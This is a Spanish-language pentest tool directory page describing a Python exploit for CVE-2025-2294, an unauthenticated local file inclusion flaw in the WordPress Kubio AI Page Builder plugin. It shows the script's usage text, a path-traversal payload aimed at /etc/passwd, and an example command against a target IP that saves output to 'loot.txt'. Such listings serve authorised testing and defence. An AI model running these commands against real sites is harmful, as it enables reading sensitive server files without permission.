Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/r0otk3r/cve-2025-2294
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubr0otk3r/cve-2025-2294

CVE-2025-2294

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-2294 - Explotación de inclusión de archivos locales (LFI) en WordPress Kubio AI Page Builder <= 2.5.1


Resumen

CVE-2025-2294 afecta al plugin Kubio AI Page Builder para WordPress (versiones hasta la 2.5.1 inclusive). Presenta una vulnerabilidad de inclusión de archivos locales (LFI) sin autenticación a través de la función thekubio_hybrid_theme_load_template.

Esta vulnerabilidad permite a un atacante incluir y ejecutar archivos arbitrarios en el servidor WordPress vulnerable, lo que puede conducir a:

  • Eludir controles de acceso
  • Leer archivos sensibles del servidor
  • Ejecución remota de código (si el atacante puede subir archivos PHP maliciosos disfrazados como tipos de archivo seguros)

Detalles de la vulnerabilidad

  • Tipo de vulnerabilidad: Inclusión de archivos locales (LFI)
  • Plugin afectado: Kubio AI Page Builder
  • Versiones afectadas: ≤ 2.5.1
  • Vector de ataque: Petición HTTP sin autenticación con parámetros manipulados
  • Explotabilidad: Alta
  • Puntuación CVSS: 9.8 (Crítica) [CNA: Wordfence]

Descripción del script de explotación

Este script en Python envía peticiones HTTP GET especialmente manipuladas al sitio WordPress vulnerable para verificar si es vulnerable al problema de inclusión de archivos locales.

Características:

  • Probar una única URL o múltiples objetivos desde un archivo.
  • Carga útil personalizable para inclusión de archivos arbitrarios (predeterminado: /etc/passwd).
  • Guardar la respuesta completa en un archivo.
  • Vista previa de las primeras N líneas de la respuesta para una validación rápida.
  • Soporte para proxy HTTP.
  • Modo de solo verificación para escaneo de vulnerabilidades sin guardar la salida.

Uso

root@kitploit:~
usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
                        [--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
                        [--check] [--list LIST]

CVE-2025-2294 LFI Exploit

optional arguments:
  -h, --help       show this help message and exit
  --url URL        Target URL (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD
                   LFI payload path (default: ../../../../../../../../etc/passwd)
  --save SAVE      Save full response to file (optional)
  --lines LINES    Number of preview lines (default: 10)
  --timeout TIMEOUT
                   Request timeout in seconds (default: 10)
  --proxy PROXY    Proxy URL (e.g., http://127.0.0.1:8080)
  --check          Check vulnerability status only, no saving or preview
  --list LIST      Path to file with list of URLs to check one by one

Ejemplo avanzado con carga útil personalizada, proxy y vista previa ampliada:

root@kitploit:~
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"
Screenshot_2025-07-27_16_32_55

Solicitud/Respuesta:

Screenshot_2025-07-28_02_22_52

⚠️ Aviso legal

Esta herramienta está destinada únicamente para pruebas de seguridad autorizadas y fines de investigación. El uso no autorizado contra sistemas sin permiso es ilegal y poco ético.


Canales oficiales

  • YouTube @rootctf
  • X @r0otk3r
Descargar herramienta